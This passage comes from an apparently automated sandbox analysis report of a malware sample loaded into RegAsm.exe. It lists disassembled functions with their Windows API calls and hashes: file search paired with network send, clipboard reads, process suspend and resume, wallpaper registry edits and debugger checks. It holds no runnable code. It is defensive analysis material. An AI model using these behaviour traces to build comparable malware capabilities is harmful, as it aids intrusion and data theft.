                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$FirstNextsend
                                                                                                                                                                      • String ID: XPG$XPG
                                                                                                                                                                      • API String ID: 4113138495-1962359302
                                                                                                                                                                      • Opcode ID: 7dbd6f8b18a356aa144966577a14d72b83863f0c29c9cdf64239cb3f20770996
                                                                                                                                                                      • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                                                                                                      • Opcode Fuzzy Hash: 7dbd6f8b18a356aa144966577a14d72b83863f0c29c9cdf64239cb3f20770996
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                                                                                                      APIs
                                                                                                                                                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                                                        • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                                                                                        • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                                                                                        • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                      • API String ID: 4127273184-3576401099
                                                                                                                                                                      • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                                                                      • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                                                                                                      • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                                                                                                      • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                      • String ID: p'E$JD
                                                                                                                                                                      • API String ID: 1084509184-908320845
                                                                                                                                                                      • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                                                                      • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                                                                                                      • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                                                                                                      • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2829624132-0
                                                                                                                                                                      • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                                                                      • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                                                                                                      • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                                                                      • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                      • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                      • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                                      • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                      • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                                                                      • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                                                                                                      • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                      • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                      • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                      • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                                                      • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                                                                                      • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2058664381-0
                                                                                                                                                                      • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                                                      • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                                                                                      • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                                                                                                      • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                                                                                                                                                      • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041BBE7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CloseHandleOpenResume
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3614150671-0
                                                                                                                                                                      • Opcode ID: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                                                                      • Instruction ID: 00af7d86c2812e48088786baf9e1e683bef33431c8858657b58e82835f0f92e7
                                                                                                                                                                      • Opcode Fuzzy Hash: dda695613aab68fa1ce07225af6d1ac6bad924da5be1ebe3a2a6355b7b364d52
                                                                                                                                                                      • Instruction Fuzzy Hash: 7AD05E36204121E3C220176A7C0CD97AD68DBC5AA2705412AF804C22609A60CC0186E4
                                                                                                                                                                      APIs
                                                                                                                                                                      • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                                                                                                                                                      • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0041BBBB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CloseHandleOpenSuspend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1999457699-0
                                                                                                                                                                      • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                                                      • Instruction ID: 611eda4fe747f1c58df557fb912083c2b4b70512fbfbfb6239720577e9304ccf
                                                                                                                                                                      • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                                                                                                                                                      • Instruction Fuzzy Hash: 98D05E36204121E3C7211B6A7C0CD97AD68DFC5AA2705412AF804D26549A20CC0186E4
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                      • String ID: MZ@
                                                                                                                                                                      • API String ID: 2325560087-2978689999
                                                                                                                                                                      • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                                                      • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                                                                                                      • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                                                      • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.643127619.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.643112844.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.643127619.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_10000000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: .
                                                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                                                      • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                      • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                                                                                                                                      • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                                                                                                                                      • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: .
                                                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                                                      • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                                                                      • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                                                                                                                      • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                                                                                                      • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                      • String ID: JD
                                                                                                                                                                      • API String ID: 1084509184-2669065882
                                                                                                                                                                      • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                                                                      • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                                                                                                      • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                                                                                                      • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                                                                                      • API String ID: 2299586839-2904428671
                                                                                                                                                                      • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                                                                                      • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                                                                                                      • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                                                                                                      • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1661935332-0
                                                                                                                                                                      • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                                                                      • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                                                                                                      • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                                                                                                      Memory Dump Source
